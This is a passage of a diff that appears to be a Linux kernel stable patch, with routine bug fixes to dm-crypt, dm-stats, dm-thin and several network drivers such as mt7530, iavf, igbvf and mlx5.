+@@ -1966,8 +1872,8 @@ static const struct of_device_id qnoc_of_match[] = {
+ MODULE_DEVICE_TABLE(of, qnoc_of_match);
+ 
+ static struct platform_driver qnoc_driver = {
+-	.probe = qnoc_probe,
+-	.remove = qnoc_remove,
++	.probe = qcom_icc_rpmh_probe,
++	.remove = qcom_icc_rpmh_remove,
+ 	.driver = {
+ 		.name = "qnoc-sm8450",
+ 		.of_match_table = qnoc_of_match,
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 2653516bcdef5..dc2d0d61ade93 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -71,7 +71,9 @@ struct dm_crypt_io {
+ 	struct crypt_config *cc;
+ 	struct bio *base_bio;
+ 	u8 *integrity_metadata;
+-	bool integrity_metadata_from_pool;
++	bool integrity_metadata_from_pool:1;
++	bool in_tasklet:1;
++
+ 	struct work_struct work;
+ 	struct tasklet_struct tasklet;
+ 
+@@ -1728,6 +1730,7 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
++	io->in_tasklet = false;
+ 	atomic_set(&io->io_pending, 0);
+ }
+ 
+@@ -1773,14 +1776,13 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 	 * our tasklet. In this case we need to delay bio_endio()
+ 	 * execution to after the tasklet is done and dequeued.
+ 	 */
+-	if (tasklet_trylock(&io->tasklet)) {
+-		tasklet_unlock(&io->tasklet);
+-		bio_endio(base_bio);
++	if (io->in_tasklet) {
++		INIT_WORK(&io->work, kcryptd_io_bio_endio);
++		queue_work(cc->io_queue, &io->work);
+ 		return;
+ 	}
+ 
+-	INIT_WORK(&io->work, kcryptd_io_bio_endio);
+-	queue_work(cc->io_queue, &io->work);
++	bio_endio(base_bio);
+ }
+ 
+ /*
+@@ -1933,6 +1935,7 @@ pop_from_list:
+ 			io = crypt_io_from_node(rb_first(&write_tree));
+ 			rb_erase(&io->rb_node, &write_tree);
+ 			kcryptd_io_write(io);
++			cond_resched();
+ 		} while (!RB_EMPTY_ROOT(&write_tree));
+ 		blk_finish_plug(&plug);
+ 	}
+@@ -2228,6 +2231,7 @@ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ 		 * it is being executed with irqs disabled.
+ 		 */
+ 		if (in_hardirq() || irqs_disabled()) {
++			io->in_tasklet = true;
+ 			tasklet_init(&io->tasklet, kcryptd_crypt_tasklet, (unsigned long)&io->work);
+ 			tasklet_schedule(&io->tasklet);
+ 			return;
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index f105a71915ab6..d12ba9bce145d 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -188,7 +188,7 @@ static int dm_stat_in_flight(struct dm_stat_shared *shared)
+ 	       atomic_read(&shared->in_flight[WRITE]);
+ }
+ 
+-void dm_stats_init(struct dm_stats *stats)
++int dm_stats_init(struct dm_stats *stats)
+ {
+ 	int cpu;
+ 	struct dm_stats_last_position *last;
+@@ -197,11 +197,16 @@ void dm_stats_init(struct dm_stats *stats)
+ 	INIT_LIST_HEAD(&stats->list);
+ 	stats->precise_timestamps = false;
+ 	stats->last = alloc_percpu(struct dm_stats_last_position);
++	if (!stats->last)
++		return -ENOMEM;
++
+ 	for_each_possible_cpu(cpu) {
+ 		last = per_cpu_ptr(stats->last, cpu);
+ 		last->last_sector = (sector_t)ULLONG_MAX;
+ 		last->last_rw = UINT_MAX;
+ 	}
++
++	return 0;
+ }
+ 
+ void dm_stats_cleanup(struct dm_stats *stats)
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index 09c81a1ec057d..ee32b099f1cf7 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -21,7 +21,7 @@ struct dm_stats_aux {
+ 	unsigned long long duration_ns;
+ };
+ 
+-void dm_stats_init(struct dm_stats *st);
++int dm_stats_init(struct dm_stats *st);
+ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index d28c9077d6ed2..90df6c3da77a2 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -3357,6 +3357,7 @@ static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	pt->low_water_blocks = low_water_blocks;
+ 	pt->adjusted_pf = pt->requested_pf = pf;
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 
+ 	/*
+ 	 * Only need to enable discards if the pool should pass
+@@ -4235,6 +4236,7 @@ static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		goto bad;
+ 
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 	ti->flush_supported = true;
+ 	ti->accounts_remapped_io = true;
+ 	ti->per_io_data_size = sizeof(struct dm_thin_endio_hook);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index d727ed9cd623f..89bf28ed874c2 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2105,7 +2105,9 @@ static struct mapped_device *alloc_dev(int minor)
+ 	if (!md->pending_io)
+ 		goto bad;
+ 
+-	dm_stats_init(&md->stats);
++	r = dm_stats_init(&md->stats);
++	if (r < 0)
++		goto bad;
+ 
+ 	/* Populate the mapping, nobody knows we exist yet */
+ 	spin_lock(&_minor_lock);
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index e968322dfbf0b..70887e0aece33 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -263,7 +263,7 @@ static int b53_mmap_probe_of(struct platform_device *pdev,
+ 		if (of_property_read_u32(of_port, "reg", &reg))
+ 			continue;
+ 
+-		if (reg < B53_CPU_PORT)
++		if (reg < B53_N_PORTS)
+ 			pdata->enabled_ports |= BIT(reg);
+ 	}
+ 
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 1757d6a2c72ae..38bf760b5b5ee 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -396,6 +396,9 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ /* Set up switch core clock for MT7530 */
+ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ {
++	/* Disable core clock */
++	core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
++
+ 	/* Disable PLL */
+ 	core_write(priv, CORE_GSWPLL_GRP1, 0);
+ 
+@@ -409,14 +412,19 @@ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ 		   RG_GSWPLL_EN_PRE |
+ 		   RG_GSWPLL_POSDIV_200M(2) |
+ 		   RG_GSWPLL_FBKDIV_200M(32));
++
++	udelay(20);
++
++	/* Enable core clock */
++	core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
+ }
+ 
+-/* Setup TX circuit including relevant PAD and driving */
++/* Setup port 6 interface mode and TRGMII TX circuit */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+-	u32 ncpo1, ssc_delta, trgint, i, xtal;
++	u32 ncpo1, ssc_delta, trgint, xtal;
+ 
+ 	xtal = mt7530_read(priv, MT7530_MHWTRAP) & HWTRAP_XTAL_MASK;
+ 
+@@ -433,6 +441,10 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
++		if (xtal == HWTRAP_XTAL_25MHZ)
++			ssc_delta = 0x57;
++		else
++			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+ 			/* PLL frequency: 150MHz: 1.2GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+@@ -452,23 +464,12 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (xtal == HWTRAP_XTAL_25MHZ)
+-		ssc_delta = 0x57;
+-	else
+-		ssc_delta = 0x87;
+-
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+ 	if (trgint) {
+-		/* Lower Tx Driving for TRGMII path */
+-		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-		/* Disable MT7530 core and TRGMII Tx clocks */
+-		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++		/* Disable the MT7530 TRGMII clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 
+ 		/* Setup the MT7530 TRGMII Tx Clock */
+ 		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+@@ -485,13 +486,8 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+ 			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+ 
+-		/* Enable MT7530 core and TRGMII Tx clocks */
+-		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-			 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-	} else {
+-		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+-			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+-				   RD_TAP_MASK, RD_TAP(16));
++		/* Enable the MT7530 TRGMII clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 	}
+ 
+ 	return 0;
+@@ -2206,6 +2202,15 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
++	/* Lower Tx driving for TRGMII path */
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_rmw(priv, MT7530_TRGMII_RD(i),
++			   RD_TAP_MASK, RD_TAP(16));
++
+ 	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/google/gve/gve_ethtool.c b/drivers/net/ethernet/google/gve/gve_ethtool.c
+index 7b9a2d9d96243..38df602f2869c 100644
+--- a/drivers/net/ethernet/google/gve/gve_ethtool.c
++++ b/drivers/net/ethernet/google/gve/gve_ethtool.c
+@@ -535,7 +535,10 @@ static int gve_get_link_ksettings(struct net_device *netdev,
+ 				  struct ethtool_link_ksettings *cmd)
+ {
+ 	struct gve_priv *priv = netdev_priv(netdev);
+-	int err = gve_adminq_report_link_speed(priv);
++	int err = 0;
++
++	if (priv->link_speed == 0)
++		err = gve_adminq_report_link_speed(priv);
+ 
+ 	cmd->base.speed = priv->link_speed;
+ 	return err;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index b97c95f89fa02..494775d65bf28 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -171,10 +171,10 @@ static char *i40e_create_dummy_packet(u8 *dummy_packet, bool ipv4, u8 l4proto,
+ 				      struct i40e_fdir_filter *data)
+ {
+ 	bool is_vlan = !!data->vlan_tag;
+-	struct vlan_hdr vlan;
+-	struct ipv6hdr ipv6;
+-	struct ethhdr eth;
+-	struct iphdr ip;
++	struct vlan_hdr vlan = {};
++	struct ipv6hdr ipv6 = {};
++	struct ethhdr eth = {};
++	struct iphdr ip = {};
+ 	u8 *tmp;
+ 
+ 	if (ipv4) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_common.c b/drivers/net/ethernet/intel/iavf/iavf_common.c
+index 34e46a23894f4..43148c07459f8 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_common.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_common.c
+@@ -661,7 +661,7 @@ struct iavf_rx_ptype_decoded iavf_ptype_lookup[BIT(8)] = {
+ 	/* Non Tunneled IPv6 */
+ 	IAVF_PTT(88, IP, IPV6, FRG, NONE, NONE, NOF, NONE, PAY3),
+ 	IAVF_PTT(89, IP, IPV6, NOF, NONE, NONE, NOF, NONE, PAY3),
+-	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY3),
++	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY4),
+ 	IAVF_PTT_UNUSED_ENTRY(91),
+ 	IAVF_PTT(92, IP, IPV6, NOF, NONE, NONE, NOF, TCP,  PAY4),
+ 	IAVF_PTT(93, IP, IPV6, NOF, NONE, NONE, NOF, SCTP, PAY4),
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 3dad834b9b8e5..5f8fff6c701fc 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -893,6 +893,10 @@ static int iavf_vlan_rx_add_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* Do not track VLAN 0 filter, always added by the PF on VF init */
++	if (!vid)
++		return 0;
++
+ 	if (!VLAN_FILTERING_ALLOWED(adapter))
+ 		return -EIO;
+ 
+@@ -919,6 +923,10 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* We do not track VLAN 0 filter */
++	if (!vid)
++		return 0;
++
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+ 	if (proto == cpu_to_be16(ETH_P_8021Q))
+ 		clear_bit(vid, adapter->vsi.active_cvlans);
+@@ -5078,6 +5086,11 @@ static void iavf_remove(struct pci_dev *pdev)
+ 			mutex_unlock(&adapter->crit_lock);
+ 			break;
+ 		}
++		/* Simply return if we already went through iavf_shutdown */
++		if (adapter->state == __IAVF_REMOVE) {
++			mutex_unlock(&adapter->crit_lock);
++			return;
++		}
+ 
+ 		mutex_unlock(&adapter->crit_lock);
+ 		usleep_range(500, 1000);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.c b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+index 18b6a702a1d6d..e989feda133c1 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+@@ -1096,7 +1096,7 @@ static inline void iavf_rx_hash(struct iavf_ring *ring,
+ 		cpu_to_le64((u64)IAVF_RX_DESC_FLTSTAT_RSS_HASH <<
+ 			    IAVF_RX_DESC_STATUS_FLTSTAT_SHIFT);
+ 
+-	if (ring->netdev->features & NETIF_F_RXHASH)
++	if (!(ring->netdev->features & NETIF_F_RXHASH))
+ 		return;
+ 
+ 	if ((rx_desc->wb.qword1.status_error_len & rss_mask) == rss_mask) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 0752fd67c96e5..2c03ca01fdd9c 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -2438,8 +2438,6 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+ 			if (f->is_new_vlan) {
+ 				f->is_new_vlan = false;
+-				if (!f->vlan.vid)
+-					continue;
+ 				if (f->vlan.tpid == ETH_P_8021Q)
+ 					set_bit(f->vlan.vid,
+ 						adapter->vsi.active_cvlans);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index 3ba1408c56a9a..b3849bc3d4fc6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -1384,15 +1384,15 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 	struct ice_vf *vf;
+ 	int ret;
+ 
++	vf = ice_get_vf_by_id(pf, vf_id);
++	if (!vf)
++		return -EINVAL;
++
+ 	if (ice_is_eswitch_mode_switchdev(pf)) {
+ 		dev_info(ice_pf_to_dev(pf), "Trusted VF is forbidden in switchdev mode\n");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	vf = ice_get_vf_by_id(pf, vf_id);
+-	if (!vf)
+-		return -EINVAL;
+-
+ 	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index bf4317e47f948..b3aed4e2ca91c 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -3841,9 +3841,7 @@ static void igb_remove(struct pci_dev *pdev)
+ 	igb_release_hw_control(adapter);
+ 
+ #ifdef CONFIG_PCI_IOV
+-	rtnl_lock();
+ 	igb_disable_sriov(pdev);
+-	rtnl_unlock();
+ #endif
+ 
+ 	unregister_netdev(netdev);
+diff --git a/drivers/net/ethernet/intel/igbvf/netdev.c b/drivers/net/ethernet/intel/igbvf/netdev.c
+index 3a32809510fc6..72cb1b56e9f24 100644
+--- a/drivers/net/ethernet/intel/igbvf/netdev.c
++++ b/drivers/net/ethernet/intel/igbvf/netdev.c
+@@ -1074,7 +1074,7 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 			  igbvf_intr_msix_rx, 0, adapter->rx_ring->name,
+ 			  netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_tx;
+ 
+ 	adapter->rx_ring->itr_register = E1000_EITR(vector);
+ 	adapter->rx_ring->itr_val = adapter->current_itr;
+@@ -1083,10 +1083,14 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 	err = request_irq(adapter->msix_entries[vector].vector,
+ 			  igbvf_msix_other, 0, netdev->name, netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_rx;
+ 
+ 	igbvf_configure_msix(adapter);
+ 	return 0;
++free_irq_rx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
++free_irq_tx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
+ out:
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/intel/igbvf/vf.c b/drivers/net/ethernet/intel/igbvf/vf.c
+index b8ba3f94c3632..a47a2e3e548cf 100644
+--- a/drivers/net/ethernet/intel/igbvf/vf.c
++++ b/drivers/net/ethernet/intel/igbvf/vf.c
+@@ -1,6 +1,8 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /* Copyright(c) 2009 - 2018 Intel Corporation. */
+ 
++#include <linux/etherdevice.h>
++
+ #include "vf.h"
+ 
+ static s32 e1000_check_for_link_vf(struct e1000_hw *hw);
+@@ -131,11 +133,16 @@ static s32 e1000_reset_hw_vf(struct e1000_hw *hw)
+ 		/* set our "perm_addr" based on info provided by PF */
+ 		ret_val = mbx->ops.read_posted(hw, msgbuf, 3);
+ 		if (!ret_val) {
+-			if (msgbuf[0] == (E1000_VF_RESET |
+-					  E1000_VT_MSGTYPE_ACK))
++			switch (msgbuf[0]) {
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_ACK:
+ 				memcpy(hw->mac.perm_addr, addr, ETH_ALEN);
+-			else
++				break;
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_NACK:
++				eth_zero_addr(hw->mac.perm_addr);
++				break;
++			default:
+ 				ret_val = -E1000_ERR_MAC_INIT;
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 3b5b36206c44b..1d9b70e0ff67f 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6000,18 +6000,18 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 		if (e->command != TC_TAPRIO_CMD_SET_GATES)
+ 			return false;
+ 
+-		for (i = 0; i < adapter->num_tx_queues; i++) {
+-			if (e->gate_mask & BIT(i))
++		for (i = 0; i < adapter->num_tx_queues; i++)
++			if (e->gate_mask & BIT(i)) {
+ 				queue_uses[i]++;
+ 
+-			/* There are limitations: A single queue cannot be
+-			 * opened and closed multiple times per cycle unless the
+-			 * gate stays open. Check for it.
+-			 */
+-			if (queue_uses[i] > 1 &&
+-			    !(prev->gate_mask & BIT(i)))
+-				return false;
+-		}
++				/* There are limitations: A single queue cannot
++				 * be opened and closed multiple times per cycle
++				 * unless the gate stays open. Check for it.
++				 */
++				if (queue_uses[i] > 1 &&
++				    !(prev->gate_mask & BIT(i)))
++					return false;
++			}
+ 	}
+ 
+ 	return true;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 7f8ffbf79cf74..ab126f8706c74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -709,6 +709,7 @@ err_unreg_netdev:
+ err_ptp_destroy:
+ 	otx2_ptp_destroy(vf);
+ err_detach_rsrc:
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2_detach_resources(&vf->mbox);
+@@ -762,6 +763,7 @@ static void otx2vf_remove(struct pci_dev *pdev)
+ 	otx2_shutdown_tc(vf);
+ 	otx2vf_disable_mbox_intr(vf);
+ 	otx2_detach_resources(&vf->mbox);
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2vf_vfaf_mbox_destroy(vf);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index 0c23340bfcc75..0f8f3ce35537d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -1412,6 +1412,7 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	struct mlx5e_macsec_aso *aso;
+ 	struct mlx5_aso_wqe *aso_wqe;
+ 	struct mlx5_aso *maso;
++	unsigned long expires;
+ 	int err;
+ 
+ 	aso = &macsec->aso;
+@@ -1425,7 +1426,13 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	macsec_aso_build_wqe_ctrl_seg(aso, &aso_wqe->aso_ctrl, NULL);
+ 
+ 	mlx5_aso_post_wqe(maso, false, &aso_wqe->ctrl);
+-	err = mlx5_aso_poll_cq(maso, false);
++	expires = jiffies + msecs_to_jiffies(10);
++	do {
++		err = mlx5_aso_poll_cq(maso, false);
++		if (err)
++			usleep_range(2, 10);
++	} while (err && time_is_after_jiffies(expires));
++
+ 	if (err)
+ 		goto err_out;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+index 2449731b7d79a..89de92d064836 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+@@ -117,12 +117,14 @@ static int mlx5e_dcbnl_ieee_getets(struct net_device *netdev,
+ 	if (!MLX5_CAP_GEN(priv->mdev, ets))
+ 		return -EOPNOTSUPP;
+ 
+-	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
+-	for (i = 0; i < ets->ets_cap; i++) {
++	for (i = 0; i < IEEE_8021QAZ_MAX_TCS; i++) {
+ 		err = mlx5_query_port_prio_tc(mdev, i, &ets->prio_tc[i]);
+ 		if (err)
+ 			return err;
++	}
+ 
++	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
++	for (i = 0; i < ets->ets_cap; i++) {
+ 		err = mlx5_query_port_tc_group(mdev, i, &tc_group[i]);
+ 		if (err)
+ 			return err;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 609a49c1e09e6..3b5c5064cfafc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4081,8 +4081,12 @@ static netdev_features_t mlx5e_fix_features(struct net_device *netdev,
+ 		}
+ 	}
+ 
+-	if (mlx5e_is_uplink_rep(priv))
++	if (mlx5e_is_uplink_rep(priv)) {
+ 		features = mlx5e_fix_uplink_rep_features(netdev, features);
++		features |= NETIF_F_NETNS_LOCAL;
++	} else {
++		features &= ~NETIF_F_NETNS_LOCAL;
++	}
+ 
+ 	mutex_unlock(&priv->state_lock);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+index a994e71e05c11..db578a7e7008a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+@@ -364,8 +364,7 @@ int mlx5_esw_acl_ingress_vport_bond_update(struct mlx5_eswitch *esw, u16 vport_n
+ 
+ 	if (WARN_ON_ONCE(IS_ERR(vport))) {
+ 		esw_warn(esw->dev, "vport(%d) invalid!\n", vport_num);
+-		err = PTR_ERR(vport);
+-		goto out;
++		return PTR_ERR(vport);
+ 	}
+ 
+ 	esw_acl_ingress_ofld_rules_destroy(esw, vport);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 43ba00d5e36ec..4b9d567c8f473 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -916,6 +916,7 @@ void mlx5_esw_vport_disable(struct mlx5_eswitch *esw, u16 vport_num)
+ 	 */
+ 	esw_vport_change_handle_locked(vport);
+ 	vport->enabled_events = 0;
++	esw_apply_vport_rx_mode(esw, vport, false, false);
+ 	esw_vport_cleanup(esw, vport);
+ 	esw->enabled_vports--;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 34790a82a0976..64e5b9f29206e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -3488,6 +3488,18 @@ static int esw_inline_mode_to_devlink(u8 mlx5_mode, u8 *mode)
+ 	return 0;
+ }
+ 
++static bool esw_offloads_devlink_ns_eq_netdev_ns(struct devlink *devlink)
++{
++	struct net *devl_net, *netdev_net;
++	struct mlx5_eswitch *esw;
++
++	esw = mlx5_devlink_eswitch_get(devlink);
++	netdev_net = dev_net(esw->dev->mlx5e_res.uplink_netdev);
++	devl_net = devlink_net(devlink);
++
++	return net_eq(devl_net, netdev_net);
++}
++
+ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 				  struct netlink_ext_ack *extack)
+ {
+@@ -3502,6 +3514,13 @@ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 	if (esw_mode_from_devlink(mode, &mlx5_mode))
+ 		return -EINVAL;
+ 
++	if (mode == DEVLINK_ESWITCH_MODE_SWITCHDEV &&
++	    !esw_offloads_devlink_ns_eq_netdev_ns(devlink)) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Can't change E-Switch mode to switchdev when netdev net namespace has diverged from the devlink's.");
++		return -EPERM;
++	}
++
+ 	mlx5_lag_disable_change(esw->dev);
+ 	err = mlx5_esw_try_lock(esw);
+ 	if (err < 0) {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+index 987fe5c9d5a36..09ed6e5fa6c34 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+@@ -36,33 +36,39 @@ enum mlxsw_thermal_trips {
+ 	MLXSW_THERMAL_TEMP_TRIP_HOT,
+ };
+ 
+-struct mlxsw_thermal_trip {
+-	int	type;
+-	int	temp;
+-	int	hyst;
++struct mlxsw_cooling_states {
+ 	int	min_state;
+ 	int	max_state;
+ };
+ 
